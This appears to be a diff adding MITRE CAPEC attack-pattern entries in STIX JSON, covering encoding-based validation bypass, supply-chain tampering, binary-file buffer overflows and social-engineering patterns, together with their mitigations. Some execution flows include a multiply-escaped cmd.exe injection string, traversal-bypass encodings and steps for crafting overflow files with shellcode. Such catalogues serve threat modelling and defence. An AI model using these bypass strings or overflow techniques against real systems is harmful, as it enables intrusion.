"Exploiting Multiple Input Interpretation Layers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The backslash character provides a good example of the multiple-parser issue. A backslash is used to escape characters in strings, but is also used to delimit directories on the NT file system. When performing a command injection that includes NT paths, there is usually a need to \"double escape\" the backslash. In some cases, a quadruple escape is necessary.\n Original String: C:\\\\\\\\winnt\\\\\\\\system32\\\\\\\\cmd.exe /c\n \n Interim String: C:\\\\winnt\\\\system32\\\\cmd.exe /c\n \n Final String: C:\\winnt\\system32\\cmd.exe /c\n This diagram shows each successive layer of parsing translating the backslash character. A double backslash becomes a single as it is parsed. By using quadruple backslashes, the attacker is able to control the result in the final string.\n [REF-1]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application/system inputs where bypassing input validation is desired: The attacker first needs to determine all of the application's/system's inputs where input validation is being performed and where they want to bypass it.

    2. Techniques
    While using an application/system, the attacker discovers an input where validation is stopping them from performing some malicious or unauthorized actions.

Experiment

  1. Determine which character encodings are accepted by the application/system: The attacker then needs to provide various character encodings to the application/system and determine which ones are accepted. The attacker will need to observe the application's/system's response to the encoded data to determine whether the data was interpreted properly.

    2. Techniques
    Determine which escape characters are accepted by the application/system. A common escape character is the backslash character, '\\'
    Determine whether URL encoding is accepted by the application/system.
    Determine whether UTF-8 encoding is accepted by the application/system.
    Determine whether UTF-16 encoding is accepted by the application/system.
    Determine if any other encodings are accepted by the application/system.

  2. Combine multiple encodings accepted by the application.: The attacker now combines encodings accepted by the application. The attacker may combine different encodings or apply the same encoding multiple times.

    3. Techniques
    Combine same encoding multiple times and observe its effects. For example, if special characters are encoded with a leading backslash, then the following encoding may be accepted by the application/system: \"\\\\\\.\". With two parsing layers, this may get converted to \"\\.\" after the first parsing layer, and then, to \".\" after the second. If the input validation layer is between the two parsing layers, then \"\\\\\\.\\\\\\.\" might pass a test for \"..\" but still get converted to \"..\" afterwards. This may enable directory traversal attacks.
    Combine multiple encodings and observe the effects. For example, the attacker might encode \".\" as \"\\.\", and then, encode \"\\.\" as \"\.\", and then, encode that using URL encoding to \"%26%2392%3B%26%2346%3B\"

Exploit

  1. Leverage ability to bypass input validation: Attacker leverages their ability to bypass input validation to gain unauthorized access to system. There are many attacks possible, and a few examples are mentioned here.

    2. Techniques
    Gain access to sensitive files.
    Perform command injection.
    Perform SQL injection.
    Perform XSS attacks.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "User input is used to construct a command to be executed on the target system or as part of the file name.", + "Multiple parser passes are performed on the data supplied by the user." + ], + "x_capec_skills_required": { + "Medium": "Knowledge of various escaping schemes, such as URL escape encoding and XML escape characters." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An iterative approach to input validation may be required to ensure that no dangerous characters are present. It may be necessary to implement redundant checking across different input validation layers. Ensure that invalid data is rejected as soon as possible and do not continue to work with it.", + "id": "course-of-action--809958b7-bafc-4845-87c4-cab53e86cb67", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-43-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1cce6424-2120-47d0-979c-8ee21cfa1e1a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--809958b7-bafc-4845-87c4-cab53e86cb67", + "target_ref": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure to perform input validation on canonicalized data (i.e. data that is data in its most standard form). This will help avoid tricky encodings getting past the filters.", + "id": "course-of-action--d94176ef-a1ff-499b-86b7-e94e8734ab6a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-43-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c2e5ce6d-7c06-4bf7-9b38-475351b97ad1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d94176ef-a1ff-499b-86b7-e94e8734ab6a", + "target_ref": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist would not be permitted to enter into the system.", + "id": "course-of-action--f0f8d5a1-d4cc-4eac-b405-4af5e4a821c6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-43-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--45fc127a-991a-47f3-a564-b96d95896f3c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0f8d5a1-d4cc-4eac-b405-4af5e4a821c6", + "target_ref": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-430", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/430.html" + } + ], + "id": "attack-pattern--8428f01f-d4ca-4fb0-866d-8d5716b36265", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Micro-Expressions", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-431", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/431.html" + } + ], + "id": "attack-pattern--76afdae0-2970-44dc-8ae0-fd04629b0dab", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Neuro-Linguistic Programming (NLP)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-432", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/432.html" + } + ], + "id": "attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Voice in NLP", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker utilizes a technique to insinuate commands to the subconscious mind of the target via communication patterns. The human buffer overflow methodology does not rely on over-stimulating the mind of the target, but rather embedding messages within communication that the mind of the listener assembles at a subconscious level. The human buffer-overflow method is similar to subconscious programming to the extent that messages are embedded within the message.", + "external_references": [ + { + "external_id": "CAPEC-433", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/433.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--6d30ec21-b3b4-435d-9045-acd660865e6a", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Target Influence via The Human Buffer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_extended_description": "\n The fundamental difference is that embedded messages have a complete semantic quality, rather than mere imagery, and the mind of the target tends to key off of particular dominant patterns. The remaining information, carefully structured, speaks directly to the subconscious with a subtle, indirect, command. The effect is to produce a pattern of thinking that the attacker has predetermined but is buried within the message and not overtly stated. Structuring a human \"buffer overflow\" requires precise attention to detail and the use of information in a manner that distracts the conscious mind from the message the subconscious is receiving.\n ", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "", + "external_references": [ + { + "external_id": "CAPEC-434", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/434.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--c207660b-d5b1-4928-b472-251f19a094d0", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Target Influence via Interview and Interrogation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "", + "external_references": [ + { + "external_id": "CAPEC-435", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/435.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Target Influence via Instant Rapport", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.", + "external_references": [ + { + "external_id": "CAPEC-438", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/438.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Marcus Sachs, Supply Chain Attacks: Can We Secure Information Technology Supply Chain in the Age of Globalization, Verizon, Inc.", + "external_id": "REF-380", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Thea Reilkoff, Hardware Trojans: A Novel Attack Meets a New Defense, 2010, Yale School of Engineering and Applied Science", + "external_id": "REF-381", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Marianne Swanson, Nadya Bartol, Rama Moorthy, Piloting Supply Chain Risk Management Practices for Federal Information Systems (Draft NISTIR 7622), 2010, National Institute of Standards and Technology", + "external_id": "REF-382", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Modification During Manufacture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker undermines the integrity of a product, software, or technology at some stage of the distribution channel. The core threat of modification or manipulation during distribution arise from the many stages of distribution, as a product may traverse multiple suppliers and integrators as the final asset is delivered. Components and services provided from a manufacturer to a supplier may be tampered with during integration or packaging.", + "external_references": [ + { + "external_id": "CAPEC-439", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/439.html" + }, + { + "external_id": "CWE-1269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1269.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "SAFECode, The Software Supply Chain Integrity Framework Defining Risks and Responsibilities for Securing Software in the Global Supply Chain, 2009, Safecode.org", + "external_id": "REF-384", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Marianne Swanson, Nadya Bartol, Rama Moorthy, Piloting Supply Chain Risk Management Practices for Federal Information Systems (Draft NISTIR 7622), 2010, National Institute of Standards and Technology", + "external_id": "REF-382", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Manipulation During Distribution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "A malicious OEM provider, or OEM provider employee or contractor, may install software, or modify existing code, during distribution.", + "External contractors involved in the packaging or testing of products or components may install software, or modify existing code, during distribution." + ], + "x_capec_parent_of_refs": [ + "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a buffer overflow vulnerability in the handling of binary resources. Binary resources may include music files like MP3, image files like JPEG files, and any other binary file. These attacks may pass unnoticed to the client machine through normal usage of files, such as a browser loading a seemingly innocent JPEG file. This can allow the adversary access to the execution stack and execute arbitrary code in the target process.", + "external_references": [ + { + "external_id": "CAPEC-44", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/44.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Overflow Binary Resource File", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "Binary files like music and video files are appended with additional data to cause buffer overflow on target systems. Because these files may be filled with otherwise popular content, the adversary has an excellent vector for wide distribution. There have been numerous cases, for example of malicious screen savers for sports teams that are distributed on the event of the team winning a championship." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target software: The adversary identifies software that uses external binary files in some way. This could be a file upload, downloading a file from a shared location, or other means.

Experiment

  1. Find injection vector: The adversary creates a malicious binary file by altering the header to make the file seem shorter than it is. Additional bytes are added to the end of the file to be placed in the overflowed location. The adversary then deploys the file to the software to determine if a buffer overflow was successful.

  2. Craft overflow content: Once the adversary has determined that this attack is viable, they will specially craft the binary file in a way that achieves the desired behavior. If the source code is available, the adversary can carefully craft the malicious file so that the return address is overwritten to an intended value. If the source code is not available, the adversary will iteratively alter the file in order to overwrite the return address correctly.

    3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Once the adversary has constructed a file that will effectively overflow the targeted software in the intended way. The file is deployed to the software, either by serving it directly to the software or placing it in a shared location for a victim to load into the software.

", + "x_capec_extended_description": "This attack pattern is a variant of standard buffer overflow attack using an unexpected vector (binary files) to wrap its attack and open up a new attack vector. The adversary is required to either directly serve the binary content to the victim, or place it in a locale like a MP3 sharing application for the victim to download. The adversary then is notified upon the download or otherwise locates the vulnerability opened up by the buffer overflow.", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software processes binary resource files.", + "Target software contains a buffer overflow vulnerability reachable through input from a user-controllable binary resource file." + ], + "x_capec_skills_required": { + "Medium": "To modify file, deceive client into downloading, locate and exploit remote stack or heap vulnerability" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform appropriate bounds checking on all buffers.", + "id": "course-of-action--67074d87-d035-4907-8971-d22cf929a6a6", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--158ab2a0-3900-4c6d-a6b8-f70b277abce5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--67074d87-d035-4907-8971-d22cf929a6a6", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbdf6185-93ce-4ed8-b163-4441304d2cec", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Static code analysis", + "id": "course-of-action--3522f721-ee24-4278-806a-1288b6ca7ce2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cb1919fb-3b75-486e-9e5c-c0319ac4b906", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3522f721-ee24-4278-806a-1288b6ca7ce2", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Execute program in less trusted process space environment, do not allow lower integrity processes to write to higher integrity processes", + "id": "course-of-action--5c9cdf1e-85f9-47f9-9628-f55b7c41c408", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0901a46-1e3d-454b-aabc-5d7a0983c5b6", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c9cdf1e-85f9-47f9-9628-f55b7c41c408", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Keep software patched to ensure that known vulnerabilities are not available for adversaries to target on host.", + "id": "course-of-action--83a440d9-6129-4c0c-b49c-61174d80b0e9", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b0230fb8-7e13-4a51-979e-255821af7f94", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--83a440d9-6129-4c0c-b49c-61174d80b0e9", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in the system maintenance process and causes a change to be made to a technology, product, component, or sub-component or a new one installed during its deployed use at the victim location for the purpose of carrying out an attack.", + "external_references": [ + { + "external_id": "CAPEC-440", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/440.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Hardware Additions", + "external_id": "T1200", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1200" + } + ], + "id": "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Integrity Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176", + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_prerequisites": [ + "Influence over the deployed system at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-441", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/441.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + } + ], + "id": "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Malicious Logic Insertion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239", + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + 